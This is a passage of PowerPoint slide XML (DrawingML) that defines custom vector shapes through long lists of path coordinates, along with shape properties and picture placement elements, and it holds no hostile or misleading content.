                <a:path w="102234" h="41275">
                  <a:moveTo>
                    <a:pt x="7771" y="12827"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4208" y="13604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8983" y="13604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7771" y="12827"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="102234" h="41275">
                  <a:moveTo>
                    <a:pt x="16762" y="10867"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4711" y="10867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7771" y="12827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16762" y="10867"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="102234" h="41275">
                  <a:moveTo>
                    <a:pt x="51423" y="2887"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="51941" y="3197"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52531" y="3068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51423" y="288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FF248152-AD83-FF9D-D4D1-11E032BB3582}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6744644" y="2623340"/>
              <a:ext cx="93980" cy="39370"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="93979" h="39369">
                  <a:moveTo>
                    <a:pt x="49833" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="13546"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43792" y="39134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93625" y="25587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49833" y="0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D69DFF41-A3C8-85A1-A7C3-8E1DF18EDF29}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6740778" y="2621721"/>
              <a:ext cx="101600" cy="42545"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="101600" h="42544">
                  <a:moveTo>
                    <a:pt x="53920" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="14654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47437" y="42373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58172" y="39455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48423" y="39455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47255" y="39300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47872" y="39133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9339" y="16618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4268" y="16618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4527" y="14654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4630" y="13867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14390" y="13867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53485" y="3240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52933" y="2918"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58914" y="2918"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53920" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="101600" h="42544">
                  <a:moveTo>
                    <a:pt x="47872" y="39133"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="47255" y="39300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48423" y="39455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47872" y="39133"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="101600" h="42544">
                  <a:moveTo>
                    <a:pt x="93627" y="26695"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="47872" y="39133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48423" y="39455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58172" y="39455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98456" y="28505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96726" y="28505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93627" y="26695"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="101600" h="42544">
                  <a:moveTo>
                    <a:pt x="97089" y="25754"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="93627" y="26695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96726" y="28505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96965" y="26695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97089" y="25754"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="101600" h="42544">
                  <a:moveTo>
                    <a:pt x="97998" y="25754"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="97089" y="25754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96830" y="27717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96726" y="28505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98456" y="28505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101357" y="27717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97998" y="25754"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="101600" h="42544">
                  <a:moveTo>
                    <a:pt x="58914" y="2918"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="52933" y="2918"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54101" y="3072"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53485" y="3240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93627" y="26695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97089" y="25754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97998" y="25754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58914" y="2918"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="101600" h="42544">
                  <a:moveTo>
                    <a:pt x="4630" y="13867"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4392" y="15678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4268" y="16618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7729" y="15678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4630" y="13867"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="101600" h="42544">
                  <a:moveTo>
                    <a:pt x="7729" y="15678"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4268" y="16618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9339" y="16618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7729" y="15678"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="101600" h="42544">
                  <a:moveTo>
                    <a:pt x="14390" y="13867"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4630" y="13867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7729" y="15678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14390" y="13867"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="101600" h="42544">
                  <a:moveTo>
                    <a:pt x="52933" y="2918"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="53485" y="3240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54101" y="3072"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52933" y="2918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712DF1ED-4C62-FD26-991E-692866388EF4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6821652" y="2572169"/>
              <a:ext cx="328295" cy="72390"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="328295" h="72389">
                  <a:moveTo>
                    <a:pt x="93624" y="61709"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="49834" y="36131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="51181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43789" y="72250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93624" y="61709"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="328295" h="72389">
                  <a:moveTo>
                    <a:pt x="172148" y="48171"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="126847" y="25590"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75501" y="34620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120802" y="61709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172148" y="48171"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="328295" h="72389">
                  <a:moveTo>
                    <a:pt x="247662" y="37630"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="202349" y="12039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154025" y="21069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="199339" y="48171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="247662" y="37630"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="328295" h="72389">
                  <a:moveTo>
                    <a:pt x="327685" y="24079"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="280873" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231051" y="13550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="276352" y="36131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327685" y="24079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58E42849-BF68-E67F-02E2-A9334A7712C1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6803538" y="2615814"/>
              <a:ext cx="326390" cy="78740"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="326390" h="78739">
                  <a:moveTo>
                    <a:pt x="217453" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="36123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108726" y="78268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="326180" y="39134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21745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C1D76FB8-7916-DA5C-6406-E7EC4F142174}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6439605" y="2633876"/>
              <a:ext cx="291465" cy="137160"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="291465" h="137160">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="30103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="291448" y="136969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="291448" y="103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D907B6B2-7968-97DB-48F4-C8A2DAB3C66D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6344784" y="2058364"/>
              <a:ext cx="984885" cy="721995"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="85759" y="584338"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="85759" y="613428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="382423" y="721797"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="483845" y="704003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386369" y="704003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="381678" y="703587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="384079" y="703166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121149" y="607121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103880" y="607121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97937" y="598642"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103880" y="598642"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103880" y="586745"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91071" y="586745"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85759" y="584338"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="384079" y="703166"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="381678" y="703587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386369" y="704003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="384079" y="703166"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="966145" y="601045"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="384079" y="703166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386369" y="704003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="483845" y="704003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="984267" y="616206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="984267" y="608626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="966145" y="608626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="966145" y="601045"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="973635" y="599731"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="966145" y="601045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="966145" y="608626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="973635" y="599731"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="984267" y="599731"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="973635" y="599731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="966145" y="608626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="984267" y="608626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="984267" y="599731"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="97937" y="598642"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="103880" y="607121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103880" y="600813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97937" y="598642"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="103880" y="600813"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="103880" y="607121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121149" y="607121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103880" y="600813"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="966145" y="584761"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="966145" y="601045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="973635" y="599731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="984267" y="599731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="984267" y="586970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="972005" y="586970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="966145" y="584761"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="103880" y="598642"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="97937" y="598642"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103880" y="600813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103880" y="598642"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="966145" y="578523"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="966145" y="584761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="972005" y="586970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="966145" y="578523"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="984267" y="578523"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="966145" y="578523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="972005" y="586970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="984267" y="586970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="984267" y="578523"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="85759" y="578523"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="85759" y="584338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91071" y="586745"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85759" y="578523"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="103880" y="578523"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="85759" y="578523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91071" y="586745"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103880" y="586745"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103880" y="578523"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="628148" y="10837"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="609843" y="10837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="619427" y="18583"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="611018" y="19142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="675542" y="475208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="966145" y="584761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="966145" y="578523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="984267" y="578523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="984267" y="572283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="706016" y="467382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="692737" y="467382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="686959" y="460197"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="691721" y="460197"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="628148" y="10837"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="626615" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="595084" y="2107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="106043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69968" y="577184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85759" y="584338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85759" y="578523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103880" y="578523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103880" y="572707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97187" y="569674"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87171" y="569674"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81958" y="562775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86146" y="562775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20734" y="122319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11818" y="122319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19217" y="112104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70296" y="112104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="597053" y="20088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="596776" y="20088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="611018" y="19142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="609843" y="10837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="628148" y="10837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="626615" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="81958" y="562775"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="87171" y="569674"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86448" y="564809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81958" y="562775"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="86448" y="564809"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="87171" y="569674"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97187" y="569674"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86448" y="564809"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="86146" y="562775"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="81958" y="562775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86448" y="564809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86146" y="562775"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="686959" y="460197"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="692737" y="467382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="691989" y="462093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="686959" y="460197"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="691989" y="462093"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="692737" y="467382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="706016" y="467382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="691989" y="462093"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="691721" y="460197"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="686959" y="460197"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="691989" y="462093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="691721" y="460197"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="19217" y="112104"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="11818" y="122319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20509" y="120801"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19217" y="112104"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="20509" y="120801"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="11818" y="122319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20734" y="122319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20509" y="120801"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="70296" y="112104"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="19217" y="112104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20509" y="120801"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70296" y="112104"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="984884" h="721994">
                  <a:moveTo>
                    <a:pt x="609843" y="10837"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="610939" y="18583"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="611018" y="19142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="619427" y="18583"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="609843" y="10837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9" name="object 35">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87776B8C-7D73-9560-B163-4F10E5E1346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32054" y="2137174"/>
              <a:ext cx="531553" cy="441011"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="40" name="object 36">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E279945-9986-BCA8-241B-4EDAE5B3B28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56788" y="2196384"/>
              <a:ext cx="301918" cy="299719"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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E76AF87C-B32F-020E-5F76-E8A29619A393}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6485497" y="2785900"/>
              <a:ext cx="715645" cy="120650"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="23307" y="4084"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="4084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65187" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65187" y="76951"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23307" y="76951"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23307" y="4084"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="114097" y="24160"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="77968" y="45641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75387" y="60756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76069" y="68799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99848" y="94040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100059" y="94040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108079" y="95679"/>
                  </a:lnTo>
